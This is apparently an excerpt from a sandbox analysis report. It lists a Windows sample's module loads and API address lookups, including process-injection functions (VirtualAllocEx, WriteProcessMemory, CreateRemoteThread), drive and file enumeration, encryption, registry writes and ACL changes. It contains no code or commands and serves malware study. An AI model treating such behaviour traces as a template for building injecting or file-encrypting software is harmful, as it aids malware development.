| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x76240000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x77740000 |
|
1 | |
